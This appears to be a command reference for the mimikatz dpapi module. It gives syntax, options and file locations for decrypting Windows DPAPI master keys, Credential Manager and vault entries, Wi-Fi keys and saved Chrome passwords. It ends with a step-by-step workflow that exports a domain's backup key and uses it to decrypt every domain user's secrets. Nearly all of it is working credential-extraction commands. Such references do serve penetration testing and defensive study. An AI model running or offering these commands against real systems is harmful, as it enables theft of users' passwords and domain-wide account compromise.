dpapi
Data Protection API (DPAPI) operations. Decrypt blobs, extract master keys, recover credentials protected by user or domain context.
DPAPI Hierarchy
Blob (encrypted data)
<- protected by -> Masterkey (encrypted raw key)
<- protected by -> User credentials (SID + password hash) OR Domain backup key
masterkey - Work with Masterkey Files
Decrypt or operate on DPAPI masterkey files.
mimikatz # dpapi::masterkey /in:<masterkey-file> [/password:<password>] [/hash:<nt-hash>] [/sid:<sid>] [/pvk:<domain-backup-key.pvk>] [/rpc] [/dc:<dc-ip>]
Options
/in:<file> - path to masterkey file (usually in %APPDATA%\Microsoft\Protect\<SID>\)
/password:<password> - user's plaintext password
/hash:<nt-hash> - user's NTLM hash (SHA1 of NT hash used internally)
/sid:<sid> - user's SID
/pvk:<file> - domain backup key PVK file (from lsadump::backupkeys)
/rpc - use RPC to domain controller for decryption
/dc:<dc-ip> - domain controller IP/FQDN
Examples
# Decrypt with user password
mimikatz # dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<sid>\<guid>" /password:<password>
# Decrypt with domain backup key (works for any domain user)
mimikatz # dpapi::masterkey /in:<masterkey-file> /pvk:ntds_capi_0_domain-backup-key.pvk
# Decrypt via DC RPC (if SYSTEM or DA)
mimikatz # dpapi::masterkey /in:<masterkey-file> /rpc
cache - Display Cached Master Keys
Show master keys cached in the current LSASS session (available in memory).
mimikatz # dpapi::cache
blob - Decrypt DPAPI Blob
Decrypt an arbitrary DPAPI encrypted blob.
mimikatz # dpapi::blob /in:<blob-file> [/masterkey:<hex-key>] [/unprotect] [/entropy:<hex>]
Options
/in:<file> - DPAPI blob file
/masterkey:<hex-key> - decrypted master key (from dpapi::masterkey or dpapi::cache)
/unprotect - use CryptUnprotectData for current user context
/entropy:<hex> - optional entropy bytes if blob was protected with entropy
protect - Encrypt Data with DPAPI
Encrypt data using DPAPI.
mimikatz # dpapi::protect /data:<hex-data> [/entropy:<hex>]
credhist - Credential History
Work with credential history files (previous password hashes for masterkey decryption across password changes).
mimikatz # dpapi::credhist /in:<credhist-file> /sid:<sid>
cred - Extract DPAPI-Protected Credentials
Decrypt Windows Credential files (Credential Manager, vault, etc.).
mimikatz # dpapi::cred /in:<credential-file> [/masterkey:<hex-key>]
Credential file locations
%APPDATA%\Microsoft\Credentials\
%LOCALAPPDATA%\Microsoft\Credentials\
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
vault - Extract Vault Files
Decrypt Windows Vault policy and credential files.
mimikatz # dpapi::vault /in:<vault-file> [/masterkey:<hex-key>]
wifi - Extract Wi-Fi Credentials
mimikatz # dpapi::wifi [/unprotect]
chrome - Extract Chrome Credentials
Decrypt Chrome/Chromium stored passwords.
mimikatz # dpapi::chrome /in:<login-data-file> [/masterkey:<hex-key>]
Chrome's Login Data file: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
Common Workflow: Domain-Wide DPAPI Decryption
# 1. Get domain backup key (DA required)
mimikatz # lsadump::backupkeys /system:<dc-fqdn> /export
# 2. Decrypt any user's masterkey with backup key
mimikatz # dpapi::masterkey /in:<masterkey-file> /pvk:ntds_capi_0_domain-backup-key.pvk
# 3. Use decrypted key to decrypt blobs/credentials
mimikatz # dpapi::cred /in:<cred-file> /masterkey:<hex-key>
Common Workflow: Current User DPAPI Decryption
# Via RPC to DC (any domain account)
mimikatz # dpapi::masterkey /in:<masterkey-file> /rpc
# Using known user password
mimikatz # dpapi::masterkey /in:<masterkey-file> /sid:<sid> /password:<password>
Notes
- Master key files are in %APPDATA%\Microsoft\Protect\<SID>\<GUID> (user) or %WINDIR%\System32\Microsoft\Protect\S-1-5-18\User\ (machine/SYSTEM)
- Domain backup key decrypts any domain user's masterkeys - extremely powerful
- LSASS caches decrypted masterkeys in memory - dpapi::cache extracts them if already used